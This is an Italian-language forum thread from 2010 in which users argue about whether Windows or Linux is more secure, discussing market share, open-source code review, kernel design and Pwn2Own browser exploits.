Allora ti chiedo gentilmente una cortesia: se le cose non le sai, allora evita di propagandare informazioni di cui sconosci del tutto se sono buone oppure no.

Detto il altri termini: parla soltanto di quello che conosci, ed evita di diffondere le classiche leggende metropolitane. :O
Non ho detto che Linux/Unix sia inviolabile, magari lo fosse, ma solo che non è dimostrato che più un sistema è diffuso e più è bacato.( windows in questo caso) E' solo potenzialmente più attaccabile. Ma ne caso di Windows, se viene trovata una falla fino a che Microsoft non ci mette una pezza il buco resta, e a volte è capitato che la patch ritardasse o addirittura arrivasse dopo molto tempo. Su Linux, stai tranquillo che a breve viene tappata, anzi se uno ha competenze, può tapparsela da solo.
Su questo ho già risposto ad AntonioBO.

Aggiungo che non c'è nessuna dimostrazione che un sistema più diffuso sia necessariamente più affetto da bug. In generale c'è una correlazione EMPIRICA sulla dimensione del codice: più un progetto è grande, più si rilevano bug. Null'altro.
In realtà, dovremmo fare una statistica tra il numero di attacchi riusciti e quelli non riusciti verso un sistema. Se un sistema respinge il 99% degli attacchi non mi sento di dire che è insicuro.
Non mi pare una buona norma. Il fatto che non siano stati trovati dei bug gravi in un sistema non implica che non ce ne sia uno ben nascosto, ma "distruttivo".
Perche' con Linux non si gira con i diritti a palla (root), cosa che, con Windows, accadeva fino a XP... e che in realta' continua ad accadere, visto che in molti (pseudo?) esperti consigliano di disattivare UAC appena acceso il computer e su 7, AFAIK, il livello di sicurezza e' stato ridotto per non far apparire l'avviso troppo spesso (????? :confused: ?????)!

Poi bisogna anche vedere che s'intende per molti meno danni: magari non ti tira giu' l'OS, ma se il malware pialla la home, per me sono comunque molti danni! :)
Esattamente.
a me risulta che in informatica la sicurezza assoluta non esista.
e quindi di cosa stanno a parlare?
lo giudicano sicuro, però non gli va bene lo stesso e quindi consigliano di optare per un browser sicuro al 100%... che però non esisterà mai.

mah, mi sembra tanto un attacco politico/economico.
Lo è sicuramente. Notizie come queste vengono puntualmente strumentalizzate da gente che non ha competenze tecniche, oppure che le ha ed è apertamente schierato fornedendo informazioni non corrette o falsate dalla sua visione distorta. Ovviamente per gettare fango suoi soliti noti, in nome di una presunta ideologia di "libertà".
L'open source non è un modello di sviluppo piu sicuro, in anni che uso linux ne ho viste di tutti i colori. Basta ricordare qusto caso emblematico:

Una patch mette in ginocchio Debian (http://www.ossblog.it/post/4099/una-patch-mette-in-ginocchio-debian/)

un manteiner di Debian, una delle due distro ritenute piu sicure, ha cancellato due righe di codice a caso da OpenSSH rendendo il sistema estremamante vulnerabile e per DUE ANNI nessuno ha piu controllato il codice e si è accorto del bug.

Alla faccia di quelli che dicono che l'open source è piu sicuro perche è pieno di gente che controlla il codice!
Il fatto che il codice sia disponibile a tutti non significa automaticamente che c'è anche qualcuno che lo controlla, ma anzi sono in pochissimi che lo fanno e la scarsa manodopera volontaria che sta dietro alle distro linux è del tutto insufficiente a controllare le milioni di righe di codice che ci sono.
Perfettamente d'accordo.

AntonioBO
21-01-2010, 09:09
Questi articoli andrebbero letti fino in fondo, che nella parte finale dicono una cosa giustissima e di cui tutti dovrebbero tenere conto.

Concordo.

Sei un utente, affermi che non sei preparato, ma poi dici che "sai" che è più difficile far danni su Linux...

La filosofia open source non ha dimostrato proprio niente. Se sei al corrente di una dimostrazione formale, fammelo sapere che me la vado a leggete, ma per favore: non tirare fuori la famigerata "legge" di Linus che è soltanto una bufala. :p

Tanto per farti capire che non c'è nulla di "dimostrato", ti faccio un controesempio. Supponiamo che tu abbia due centrali nucleari nei pressi della residenza di George Bush jr. da collegare all'esterno. Supponiamo che entrambe facciano uso di un sistema open source, ma la prima espone tranquillamente il codice, mentre la seconda no, e come unica differenza rispetto alla prima abbia provveduto soltanto a offuscare le scritte che appaiono all'esterno (esempio: invece di Linux Debian 5.02, Apache 2.2, ecc. ecc. si presenti come NonSonoCazziTuoi 1.0 rock stable, NonSonoAncoraCazziTuoi 1.0 rock stable, ecc. e con tutte le altre scritte cambiate e ridotte all'osso).

A questo punto c'è Bin Laden che assolda due gruppi di terroristi con conoscenze praticamente identiche per quanto riguarda le tecnologie informatiche, e affida loro il compito di accedervi e disabilitare il sistema di raffreddamento del nocciolo.

Secondo te quale sarà il gruppo che per primo riuscirà nell'impresa? :D

Il che non dimostra proprio nulla, perché non tieni conto dei processi di sviluppo ingegneristici e, in generale, delle skill delle persone che ci lavorano.

Lo sai che statisticamente il 15% circa dei bug deriva dalla correzione di altri bug? Lo sai che bug di questo tipo sono più difficili da risolvere, perché il mantainer è convinto che non ce ne siano proprio lì dove ha di recente corretto il codice (e che, quindi, "deve funzionare" perché c'ha già lavorato e conosce il codice)?

A parte sulla maggior stabilità sulla quale ci sarebbe di che discutere (ma finiamo sicuramente in un ginepraio. Anzi no: visto che non cominceremmo neppure a causa della mancanza di una definizione oggettiva e rigorosa del concetto di sistema "stabile" :D), concordo su tutto. :cool:

Allora ti chiedo gentilmente una cortesia: se le cose non le sai, allora evita di propagandare informazioni di cui sconosci del tutto se sono buone oppure no.

Detto il altri termini: parla soltanto di quello che conosci, ed evita di diffondere le classiche leggende metropolitane. :O

Su questo ho già risposto ad AntonioBO.

Aggiungo che non c'è nessuna dimostrazione che un sistema più diffuso sia necessariamente più affetto da bug. In generale c'è una correlazione EMPIRICA sulla dimensione del codice: più un progetto è grande, più si rilevano bug. Null'altro.

Non mi pare una buona norma. Il fatto che non siano stati trovati dei bug gravi in un sistema non implica che non ce ne sia uno ben nascosto, ma "distruttivo".

Esattamente.

Lo è sicuramente. Notizie come queste vengono puntualmente strumentalizzate da gente che non ha competenze tecniche, oppure che le ha ed è apertamente schierato fornedendo informazioni non corrette o falsate dalla sua visione distorta. Ovviamente per gettare fango suoi soliti noti, in nome di una presunta ideologia di "libertà".

Perfettamente d'accordo.

Per quanto mi riguarda, puoi continuare a dissanguarti comprando windows (sempre che tu abbia una copia licenziata, perché con il mulo son tutti bravi a fare gli sboroni con windows 7 super ultimate e cazzi vari...) . Io resto umilmente con il "ritardato" sistema Linux e a cusa della mia "ignoranza" continuerò a diffondere leggende metropolitane.

cdimauro
21-01-2010, 10:09
:blah: :blah: :blah: Si stava meglio quando si stava peggio, il mondo è bello perché è vario, ecc. ecc. ecc.

Come volevasi dimostrare.

Fradetti
21-01-2010, 10:39
ditelo a chi gestisce la sala pc dell'università di genova facoltà di economia al terzo piano (giusto per esser precisi, se l'amministratore bazzica hwup sappia che lo odio :D :D ).

Una sala piena di windows 2000 con ie6. :cry: :cry:

Domanda tecnica: non si potrebbe semplicemente costringere i provider a impedire l'accesso in rete a chi usa ie6? Tipo facendo apparire al posto della pagina richiesta una pagina del governo che consiglia l'aggiornamento a un nuovo browser con tanto di istruzioni chiare e semplici su come fare :O

Probabilmente ci sarebbero un mucchio di lamentele ma nel giro di 1-2 mesi tutti sti ie6 sparirebbero dalla circolazione o non navigherebbero più ;)

guyver
21-01-2010, 10:53
Questo è vero, ma non significa che non sia possibile creare un virus per Linux.

Posso dissentire?

La storia dell inviolabilità di Linux ormai ha fatto il giro del globo...
se io fossi un virus writer farei un virus con i contro OO per linux e non l'ennesimo virus per windows giusto per essere il primo :) (o per altri cento motivi) ... se questo non succede è perche, secondo me, è molto più difficile scrivere virus funzionanti per linux (e anche per mac) che per windows...
Le quote di mercato c'entrano poco a questo punto, anche perchè linux è usato, qui molti lo usano, non è che chi usa linux sono 100 persone ,ihmo anzi questa delle quote di mercato è una scusa portata avanti da chi spalleggia windows.. (naturalmente non dico a te )

Jabberwock
21-01-2010, 11:15
Posso dissentire?

La storia dell inviolabilità di Linux ormai ha fatto il giro del globo...
se io fossi un virus writer farei un virus con i contro OO per linux e non l'ennesimo virus per windows giusto per essere il primo :) (o per altri cento motivi) ... se questo non succede è perche, secondo me, è molto più difficile scrivere virus funzionanti per linux (e anche per mac) che per windows...
Le quote di mercato c'entrano poco a questo punto, anche perchè linux è usato, qui molti lo usano, non è che chi usa linux sono 100 persone ,ihmo anzi questa delle quote di mercato è una scusa portata avanti da chi spalleggia windows.. (naturalmente non dico a te )

Non se, per dire, a virus writer affianchi la parola antivirus!
Poi il bug sfruttabile c'e' ovunque, basta dare un'occhiata alle dichiarazioni del contest PWN2OWN degli ultimi due/tre anni: AFAIR, i sistemi sono stati violati passando per falle dei browser (vabbe', sorvoliamo sul fatto che oggi pare stia per venire giu' il mondo, visto che si parla di IE, ma quando succede con altri browser, anche se in un contest, parte la gara a chi minimizza prima :asd: ) e/o di plugin per i browser! Nel caso di questi ultimi, se non erro uno Adobe in particolare, tutti e tre gli OS erano esposti!

AntonioBO
21-01-2010, 17:24
Posso dissentire?

La storia dell inviolabilità di Linux ormai ha fatto il giro del globo...
se io fossi un virus writer farei un virus con i contro OO per linux e non l'ennesimo virus per windows giusto per essere il primo :) (o per altri cento motivi) ... se questo non succede è perche, secondo me, è molto più difficile scrivere virus funzionanti per linux (e anche per mac) che per windows...
Le quote di mercato c'entrano poco a questo punto, anche perchè linux è usato, qui molti lo usano, non è che chi usa linux sono 100 persone ,ihmo anzi questa delle quote di mercato è una scusa portata avanti da chi spalleggia windows.. (naturalmente non dico a te )

quotone :D

ConteZero
21-01-2010, 17:33
Non se, per dire, a virus writer affianchi la parola antivirus!
Poi il bug sfruttabile c'e' ovunque, basta dare un'occhiata alle dichiarazioni del contest PWN2OWN degli ultimi due/tre anni: AFAIR, i sistemi sono stati violati passando per falle dei browser (vabbe', sorvoliamo sul fatto che oggi pare stia per venire giu' il mondo, visto che si parla di IE, ma quando succede con altri browser, anche se in un contest, parte la gara a chi minimizza prima :asd: ) e/o di plugin per i browser! Nel caso di questi ultimi, se non erro uno Adobe in particolare, tutti e tre gli OS erano esposti!

E non è detto... i virus si attaccano alle vulnerabilità del sistema.
Windows è un unico monolite (kernel/librerie/servizi) quindi il virus dev'essere pensato per funzionare su una piattaforma k/l/s con pochissime variazioni "sul tema".
Linux è decisamente più rognoso, perché pur dando per scontata la piattaforma (ia32) non esiste un unica combinazione k/l/s se non all'interno di una specifica distribuzione (es.Ubuntu).

Questo rende tutto più complicato, inoltre le vulnerabilità su GNU/Linux sono molto più difficili da sfruttare (e non sempre è possibile automatizzare il processo) cosa che porta all'esistenza di rootkit piuttosto che virus in senso stretto.

Peraltro una macchina senza servizi aperti e con un antivirus che esamina qualsiasi file prima di renderlo disponibile agli utenti è sicura, il problema è quando si fanno concessioni alla praticità (vedasi il recente virus dei pdf).

Jabberwock
21-01-2010, 19:03
E non è detto... i virus si attaccano alle vulnerabilità del sistema.
Windows è un unico monolite (kernel/librerie/servizi) quindi il virus dev'essere pensato per funzionare su una piattaforma k/l/s con pochissime variazioni "sul tema".
Linux è decisamente più rognoso, perché pur dando per scontata la piattaforma (ia32) non esiste un unica combinazione k/l/s se non all'interno di una specifica distribuzione (es.Ubuntu).

E questo, in un certo senso, da forza all'idea delle quote di mercato!

Questo rende tutto più complicato, inoltre le vulnerabilità su GNU/Linux sono molto più difficili da sfruttare (e non sempre è possibile automatizzare il processo) cosa che porta all'esistenza di rootkit piuttosto che virus in senso stretto.

Si, per carita', ma non parlerei di "inviolabilita'" come il post a cui ho risposto, visto che con tutta la roba che gira sugli OS moderni (in primis i browser, come scrivevo), ritrovarsi con una falla che spalanca porte al mondo e' un nulla (e qui ci aggiungerei: il firewall serve anche su macchine con OS diversi da Windows)! Potrei ricordare male, ma la falla usata per violare WinVista due edizioni del PWN2OWN fa era insita in un plugin della Adobe, la cui versione per Linux era affetta dalla stessa falla (tanto che il vincitore dichiaro' che con pochi aggiustamenti l'exploit sarebbe stato efficace anche su Ubuntu)!
Come e fino a che livello la si possa sfruttare e' un'altra storia, ma, come ho scritto prima, anche la cancellazione della home (o il furto di dati dell'account user) non e' dettaglio da poco!

Peraltro una macchina senza servizi aperti e con un antivirus che esamina qualsiasi file prima di renderlo disponibile agli utenti è sicura, il problema è quando si fanno concessioni alla praticità (vedasi il recente virus dei pdf).

Qualcuno potrebbe obiettare che l'unica veramente sicura e' quella spenta! :)

ConteZero
21-01-2010, 19:08
La sicurezza di una macchina dipende essenzialmente dal sistemista che la tiene online e dall'utente che la usa quotidianamente.

trallallero
21-01-2010, 20:25
Posso dissentire?

La storia dell inviolabilità di Linux ormai ha fatto il giro del globo...
se io fossi un virus writer farei un virus con i contro OO per linux e non l'ennesimo virus per windows giusto per essere il primo :) (o per altri cento motivi) ... se questo non succede è perche, secondo me, è molto più difficile scrivere virus funzionanti per linux (e anche per mac) che per windows...
Le quote di mercato c'entrano poco a questo punto, anche perchè linux è usato, qui molti lo usano, non è che chi usa linux sono 100 persone ,ihmo anzi questa delle quote di mercato è una scusa portata avanti da chi spalleggia windows.. (naturalmente non dico a te )
Come ha descritto bene ConteZero (che ha anche spiegato involontariamente perchè i sistemi *nix siano più stabili anche se tanto cdimauro negherà pure questo), sicuramente è più facile creare un virus per un sistema Windows ma considera che chi usa Linux ne sa di più ed è più a contatto col kernel del sistema, al primo problema potrebbe intervenire da solo (non è più così che Linux = nerd, ma di certo chi va solo su internet o chatta non usa Linux).

Comunque io ho parlato di percentuali di utilizzo invertite: te lo immagini il 90% del mondo che usa Linux ?
pensi che vorrebbe dire che son diventati tutti nerd ?
chi andava su "clicca figa gratis" con Windows e si becca un trojan alla settimana continuerebbe a farlo con Linux e, anche solo per la legge di mercato, un buco nel sistema, qualunque esso sia, lo si trova.

Non a caso in ditta vige la ferrea regola (che non si caga nessuno :asd:) che vieta l'utilizzo di programmi chat/voip tipo Skype, Pidgin, etc, sia su Windows che Linux.

Jabberwock
21-01-2010, 21:17
La sicurezza di una macchina dipende essenzialmente dal sistemista che la tiene online e dall'utente che la usa quotidianamente.

E qui il mio ricordo va ai server di Poste Italiane abbattuti da Blaster (o era Sasser?) o al PC che ho sistemato l'altro giorno su cui navigavano con Google (no, non intendo Chrome: per farmi capire ho dovuto chiedere se per navigare facesse click sulla E blu)!

cdimauro
22-01-2010, 07:53
ditelo a chi gestisce la sala pc dell'università di genova facoltà di economia al terzo piano (giusto per esser precisi, se l'amministratore bazzica hwup sappia che lo odio :D :D ).

Una sala piena di windows 2000 con ie6. :cry: :cry:

Domanda tecnica: non si potrebbe semplicemente costringere i provider a impedire l'accesso in rete a chi usa ie6? Tipo facendo apparire al posto della pagina richiesta una pagina del governo che consiglia l'aggiornamento a un nuovo browser con tanto di istruzioni chiare e semplici su come fare :O
Certamente.
Probabilmente ci sarebbero un mucchio di lamentele ma nel giro di 1-2 mesi tutti sti ie6 sparirebbero dalla circolazione o non navigherebbero più ;)
Penso proprio di sì.
Posso dissentire?

La storia dell inviolabilità di Linux ormai ha fatto il giro del globo...
se io fossi un virus writer farei un virus con i contro OO per linux e non l'ennesimo virus per windows giusto per essere il primo :) (o per altri cento motivi) ... se questo non succede è perche, secondo me, è molto più difficile scrivere virus funzionanti per linux (e anche per mac) che per windows...
Le quote di mercato c'entrano poco a questo punto, anche perchè linux è usato, qui molti lo usano, non è che chi usa linux sono 100 persone ,ihmo anzi questa delle quote di mercato è una scusa portata avanti da chi spalleggia windows.. (naturalmente non dico a te )
Parli di "difficoltà", ma non dici perché dovrebbe essere più difficile scrivere virus per Linux.

Sulla facilità di scovare bug, grazie alla disponibilità dei sorgenti, e sfruttarli, invece, nulla da dire? ;)
Non se, per dire, a virus writer affianchi la parola antivirus!
Poi il bug sfruttabile c'e' ovunque, basta dare un'occhiata alle dichiarazioni del contest PWN2OWN degli ultimi due/tre anni: AFAIR, i sistemi sono stati violati passando per falle dei browser (vabbe', sorvoliamo sul fatto che oggi pare stia per venire giu' il mondo, visto che si parla di IE, ma quando succede con altri browser, anche se in un contest, parte la gara a chi minimizza prima :asd: ) e/o di plugin per i browser! Nel caso di questi ultimi, se non erro uno Adobe in particolare, tutti e tre gli OS erano esposti!
Non erri. Ma OS X l'hanno forato molto prima (meno di 2 minuti), grazie a una falla di Safari.
E non è detto... i virus si attaccano alle vulnerabilità del sistema.
Windows è un unico monolite (kernel/librerie/servizi) quindi il virus dev'essere pensato per funzionare su una piattaforma k/l/s con pochissime variazioni "sul tema".
Non mi sembra che si possa considerare un "monolite": tutti i s.o. hanno un "core", un insieme comune di funzionalità esposte, Linux incluso.
Linux è decisamente più rognoso, perché pur dando per scontata la piattaforma (ia32) non esiste un unica combinazione k/l/s se non all'interno di una specifica distribuzione (es.Ubuntu).
Quindi nemmeno un insieme di funzionalità "minimali"?
Questo rende tutto più complicato, inoltre le vulnerabilità su GNU/Linux sono molto più difficili da sfruttare (e non sempre è possibile automatizzare il processo) cosa che porta all'esistenza di rootkit piuttosto che virus in senso stretto.
Perché sarebbero più difficili da sfruttare?

Tutto ciò non sarebbe certo un problema: di una certa distro si sa cosa usa e, quindi, in che modo sarebbe attaccabile. Posto che un malintenzionato abbia un elenco di falle di sicurezza scovate spulciando i sorgenti, potrebbe perfino realizzare un tool che, dato un sistema, automaticamente tiri fuoi le falle sfruttabili. E un virus potrebbe basare le sue azioni su un meccanismo simile.
Peraltro una macchina senza servizi aperti e con un antivirus che esamina qualsiasi file prima di renderlo disponibile agli utenti è sicura, il problema è quando si fanno concessioni alla praticità (vedasi il recente virus dei pdf).
D'altra parte se ci fissiamo esclusivamente sulla sicurezza, ignorando produttività et similia, dovremmo utilizzare i PC staccati perennemente dalla rete, a prescindere dal s.o. usato.
La sicurezza di una macchina dipende essenzialmente dal sistemista che la tiene online e dall'utente che la usa quotidianamente.
Concordo.
Come ha descritto bene ConteZero (che ha anche spiegato involontariamente perchè i sistemi *nix siano più stabili anche se tanto cdimauro negherà pure questo),
Te l'ho detto: dovresti cambiare nick.

A quando le liste di proscrizione? Così evitiamo direttamente di far parlare cdimauro, no? :rolleyes:

Se c'è qualcosa di quello che ho scritto che non ti sta bene, puoi benissimo smontarlo. Non siamo forse in un forum? E nei forum chi spara cazzate non viene forse preso a mazzate dagli altri? :O O il problema è solo quello che le mazze dovrebbero essere sempre nelle stesse mani? :fagiano:
sicuramente è più facile creare un virus per un sistema Windows ma considera che chi usa Linux ne sa di più ed è più a contatto col kernel del sistema, al primo problema potrebbe intervenire da solo (non è più così che Linux = nerd, ma di certo chi va solo su internet o chatta non usa Linux).
Voglio proprio vedere tutti voi linuxari a spulciarvi i sorgenti del kernel andando a caccia del bug e fixarlo con le vostre manine.

Me lo sto già gustando lo spettacolo.

E pensare che perfino Torvalds di recente si è lamentato del casino che è diventato il progetto a cui lo stesso lavora. Non sa che c'è una pletora di nerd che non ha difficoltà. :rotfl:
Comunque io ho parlato di percentuali di utilizzo invertite: te lo immagini il 90% del mondo che usa Linux ?
pensi che vorrebbe dire che son diventati tutti nerd ?
chi andava su "clicca figa gratis" con Windows e si becca un trojan alla settimana continuerebbe a farlo con Linux e, anche solo per la legge di mercato, un buco nel sistema, qualunque esso sia, lo si trova.

Non a caso in ditta vige la ferrea regola (che non si caga nessuno :asd:) che vieta l'utilizzo di programmi chat/voip tipo Skype, Pidgin, etc, sia su Windows che Linux.
Esatto. Più un sistema è utilizzato, più sarà attaccato da chi ha tempo da perdere a scrivere virus et similia. Ma soprattutto dai malintenzionati che devono diffondere spam e trojan all'intero globo.

guyver
22-01-2010, 08:04
Esatto. Più un sistema è utilizzato, più sarà attaccato da chi ha tempo da perdere a scrivere virus et similia. Ma soprattutto dai malintenzionati che devono diffondere spam e trojan all'intero globo.

Guarda il ragionamento del "più utilizzato" può anche filare...
Ma nessuno che raccoglie la sfida? Nessuno che pensa: <Linux inviolabile? ora ci penso io e incasino tutte le distro del pianeta>

O devo pensare che tutti quelli che scrivono virus lo fanno per commessa (cioè li viene commissionato)?

Alla fine non occorrerebbe che il virus infetti molte macchine... basterebbe la sua esistenza(del virus) e la capacità di infettare nuovi sistemi in modo efficace, per distruggere il mito di "linux no virus"

trallallero
22-01-2010, 08:41
Te l'ho detto: dovresti cambiare nick.

A quando le liste di proscrizione? Così evitiamo direttamente di far parlare cdimauro, no? :rolleyes:
:wtf:

Se c'è qualcosa di quello che ho scritto che non ti sta bene, puoi benissimo smontarlo. Non siamo forse in un forum? E nei forum chi spara cazzate non viene forse preso a mazzate dagli altri? :O O il problema è solo quello che le mazze dovrebbero essere sempre nelle stesse mani? :fagiano:
Se sia cambiata la filosofia di MS non lo so, ma è risaputo che Windows fino ad XP è un unico monolite infatti, guarda caso, se crasha un programma può succedere che ti crashi tutto il sistema con un bel blue screen.
Si lo so, tu con Fedora hai avuto un kernel panic per delle semplici malloc C, ma detto da uno che in firma eslcude qualsiasi linguaggio che non sia il Python per imparare a programmare, vale poco come testimonianza.
In dieci anni di Linux-Windows non ho MAI avuto un kernel panic ma tanti blue screens :boh:

Voglio proprio vedere tutti voi linuxari a spulciarvi i sorgenti del kernel andando a caccia del bug e fixarlo con le vostre manine.

Me lo sto già gustando lo spettacolo.

E pensare che perfino Torvalds di recente si è lamentato del casino che è diventato il progetto a cui lo stesso lavora. Non sa che c'è una pletora di nerd che non ha difficoltà. :rotfl:
Vedi perchè preferisco non discutere con te, ti giri sempre il dicorso a tuo vantaggio facendo credere di non aver capito un cazzo (ma comincio ad avere qualche dubbio).
Ci riprovo:

L'utente Windows di solito, parlo proprio della massa non di chi ci lavora col PC, non sa manco che si può aprire una finestra cmd con la quale eseguire qualche comando più low level di quello che potresti fare tramite il menu avvio o aprendo una finestra browser.
L'utente medio di Windows se ha problemi con una dll (che non sa manco cos'è) od un servizio (idem) porta il PC in assistenza o s'attacca.
L'utente medio Linux è abituato ad avere a che fare con shell quindi non si va a spulciare il codice del kernel come dici tu tanto per buttarla in caciara, ma è più a contato con esso, come ho scritto, essendo abituato ad eseguire comandi da tastiera per il controllo del sistema.
È vero che ormai con Ubuntu ed altri sistemi Linux non serve quasi più la shell, ma non conosco un utente Linux che non sia capace di gestire il proprio sistema in maniera indipendente via comandi manuali.

ConteZero
22-01-2010, 08:45
Non mi sembra che si possa considerare un "monolite": tutti i s.o. hanno un "core", un insieme comune di funzionalità esposte, Linux incluso.

Con la notevole differenza che se hai Windows hai sicuramente stoppardi.dll di Microsoft che può essere in versione "pre X" o "post X" (dove X è la data dell'exploit), se hai Linux puoi avere libstoppardi.a o libnonstoppardi.a o ancora niente, in 150 possibili versioni (a seconda della build).
Stoppardi.dll esisterà in tutte le installazioni di windows, e sarà diffuso solo nelle tre o quattro build che Microsoft ha rilasciato (il che vuol dire che se c'è una vulnerabilità è facile localizzarla e fare il "fine tuning" su quella specifica dll) mentre su Linux le cose si fanno decisamente più complicate.

Quindi nemmeno un insieme di funzionalità "minimali"?

Microsoft dice che Windows è un sistema operativo "arricchito", di esso fa parte anche tutto un set di librerie, funzioni ed add on vari che, di fatto, compongono il "sistema" pur essendo solo "contorno".
Linux è solo il kernel, GNU è il set minimo a disposizione... GNU/Linux è un linux per come lo si intende colloquialmente, ma questo non vuol dire che non esista (ad esempio) GNU/Hurd (MACH/FIASCO) o GNU/FreeBSD.
Se mi parli di "funzionalità minimali" devi specificarmi di COSA stiamo parlando nel dettaglio... mica siamo in Windows, dove tutto, dall'EXECUTIVE alle librerie per i font è "sistema".

Perché sarebbero più difficili da sfruttare?

Tutto ciò non sarebbe certo un problema: di una certa distro si sa cosa usa e, quindi, in che modo sarebbe attaccabile. Posto che un malintenzionato abbia un elenco di falle di sicurezza scovate spulciando i sorgenti, potrebbe perfino realizzare un tool che, dato un sistema, automaticamente tiri fuoi le falle sfruttabili. E un virus potrebbe basare le sue azioni su un meccanismo simile.

Al di là dei nuovi layer di sicurezza (ASLR & co) aggiunti tanto su linux quanto su windows il punto è che su linux c'è molta meno unità di quanta non ve ne sia su windows.
Una distribuzione mainstream diffusissima come Ubuntu può annoverare tranquillamente venti o trenta diverse "build" per la stessa libreria (ed il "rampino" d'ingresso non puoi compilarlo sulla macchina bersaglio, dev'essere pronto PRIMA).
Peraltro trovare le falle è abbastanza facile (o meglio, trovare i REPORT in cui sono nominate), sfruttarle è decisamente più complicato (e non "un po'", parliamo di diversi ordini di grandezza).
Se la libreria ha un "buco" questo può voler dire dover adattare il "codice d'ingresso" a ventri o trenta diverse "versioni"... e stiamo parlando di una sola distribuzione, in giro di distribuzioni ce ne sono diverse.
A questo aggiungi che su windows la piattaforma è bene o male "stabile" mentre su linux varia in base alle preferenze dell'utente ed arrivi alla situazione per cui su linux non puoi essere sicuro di poter agire anche dopo l'ingresso (perchè ti manca la libreria necessaria per il privilege excalation, perché non c'è il compilatore "compatibile", perché non c'è il perl e così via) ed hai come risultato che per fare un virus che funzioni sotto linux devi progettare leviatano che consideri una quantità enorme di variabili... mentre su windows lo sviluppo è semplicissimo.

D'altra parte se ci fissiamo esclusivamente sulla sicurezza, ignorando produttività et similia, dovremmo utilizzare i PC staccati perennemente dalla rete, a prescindere dal s.o. usato.

Non dirlo a me, dillo a chi si ostina ad usare linux come desktop (senza avere le competenze necessarie per farlo*) ed a chi si ostina ad usare windows come server (senza avere un sistemista che gli tiri colpi di righello sulle mani quando decide che anche il server all'occorrenza va bene per loggarsi su faccialibro).

* io ho avuto diversi gremlin che facevano di queste "spertezze", oggi sono bravi e diligenti utenti linux che sanno darsi un pugno in un occhio... ma crescerli è stato un inferno.

gugoXX
22-01-2010, 08:59
:wtf:


Se sia cambiata la filosofia di MS non lo so, ma è risaputo che Windows fino ad XP è un unico monolite infatti, guarda caso, se crasha un programma può succedere che ti crashi tutto il sistema con un bel blue screen.

Si chiamano sistemi operativi monolitici, che e' la modalita' di progettazione anche di Linux, come idea di Torvalds, contrastando le idee di Dijkstra.
Peraltro Windows e' meno monolitico di Linux, essendo piu' vicino all'idea di MicroKernel per sfruttare la portabilita', cosi' parti dello stesso codice possono essere compilati per poter funzionare sotto diversi tipi di processori (Come gli X86 in contrasto agli Itanium)

Comunque quanto dici non e' vero. L'unico modo per avere un blue screen sotto Windows comunque e' quello di avere un baco in posizioni ben precise (non un qualsiasi baco) in un processo che gira a livello 0, ovvero parti di sistema operativo stesso o driver scritti da terze parti.
Con un crash di un semplice programma a ring 4 (come quelli che vengono eseguiti quando l'utente clicca sulle icone) non lo vedo possibile, a meno che non faccia uso di "problemi" o "bachi" di cui presenti appunto su parti di SO o Driver di terze parti (che neppure sarebbero colpa di Microsoft)

tdi150cv
22-01-2010, 09:05
Guarda il ragionamento del "più utilizzato" può anche filare...
Ma nessuno che raccoglie la sfida? Nessuno che pensa: <Linux inviolabile? ora ci penso io e incasino tutte le distro del pianeta>

O devo pensare che tutti quelli che scrivono virus lo fanno per commessa (cioè li viene commissionato)?

Alla fine non occorrerebbe che il virus infetti molte macchine... basterebbe la sua esistenza(del virus) e la capacità di infettare nuovi sistemi in modo efficace, per distruggere il mito di "linux no virus"

ehmmmm ... guarda che i virus per linux esistono come esistono gli antivirus dedicati ...

guyver
22-01-2010, 09:07
ehmmmm ... guarda che i virus per linux esistono come esistono gli antivirus dedicati ...

che io sappia non esiste un virus efficace ora...
e gli antivirus controllano quelli per windows... se la macchina linux è un server per esempio...

ConteZero
22-01-2010, 09:08
Si chiamano sistemi operativi monolitici, che e' la modalita' di progettazione anche di Linux, come idea di Torvalds, contrastando le idee di Dijkstra.
Peraltro Windows e' meno monolitico di Linux, essendo piu' vicino all'idea di MicroKernel per sfruttare la portabilita', cosi' parti dello stesso codice possono essere compilati per poter funzionare sotto diversi tipi di processori (Come gli X86 in contrasto agli Itanium)

Comunque quanto dici non e' vero. L'unico modo per avere un blue screen sotto Windows comunque e' quello di avere un baco in posizioni ben precise (non un qualsiasi baco) in un processo che gira a livello 0, ovvero parti di sistema operativo stesso o driver scritti da terze parti.
Con un crash di un semplice programma a ring 4 (come quelli che vengono eseguiti quando l'utente clicca sulle icone) non lo vedo possibile, a meno che non faccia uso di "problemi" o "bachi" di cui presenti appunto su parti di SO o Driver di terze parti (che neppure sarebbero colpa di Microsoft)

Non facciamo casino, quello è il kernel, che essenzialmente o è monolitico (un unico blob con dentro tutto) o è modulare.
I kernel monolitici sono essenzialmente più veloci e responsivi (linux è essenzialmente un kernel monolitico) in quanto tutto è fatto nello stesso "blocco" di codice mentre i kernel modulari sono fatti a compartimenti stagni con diversi spazi d'indirizzamento e diversi sottosistemi separati che collaborano passandosi messaggi (windows nt ha essenzialmente un kernel modulare).
La differenza di base è che se fai un driver, un addon, una libreria, un set di funzioni che interagisce col kernel sotto modulare basta che conosci l'interfaccia del kernel, sotto monolitico devi sapere com'è scritto perché ti tocca costruire un pezzo di codice che deve "fondersi" al kernel stesso.

Peraltro Microsoft ha ragione quando dice che il blue screen è una feature e non un bug... essendo windows essenzialmente microkernel i componenti non coinvolti dal crash a meno di uno stop forzato continuerebbero a girare e funzionare tranquillamente (ed è triste vedere un memory manager che continua a girare quando il gestore dei dischi è morto :asd:).
Il kernel vero e proprio di windows (che mi pare si chiami ancora executive) fa poco più che il postino per i messaggi fra i diversi componenti "esterni" ed il task switcher.

E'molto simile (concettualmente) a MacOSX (che usa MACH 3.0, un altro microkernel).

gugoXX
22-01-2010, 09:10
Non facciamo casino, quello è il kernel, che essenzialmente o è monolitico (un unico blob con dentro tutto) o è modulare.
I kernel monolitici sono essenzialmente più veloci e responsivi (linux è essenzialmente un kernel monolitico) in quanto tutto è fatto nello stesso "blocco" di codice mentre i kernel modulari sono fatti a compartimenti stagni con diversi spazi d'indirizzamento e diversi sottosistemi separati che collaborano passandosi messaggi (windows nt ha essenzialmente un kernel modulare).
La differenza di base è che se fai un driver, un addon, una libreria, un set di funzioni che interagisce col kernel sotto modulare basta che conosci l'interfaccia del kernel, sotto monolitico devi sapere com'è scritto perché ti tocca costruire un pezzo di codice che deve "fondersi" al kernel stesso.

E dove avrei fatto casino?

ConteZero
22-01-2010, 09:19
E dove avrei fatto casino?

Intanto hai confuso un OS col suo kernel... poi hai detto che XP è monolitico (il suo kernel non lo è, chiedi a Digital Research... lo è il resto a causa dell'uso spregiudicato dei lock).

gugoXX
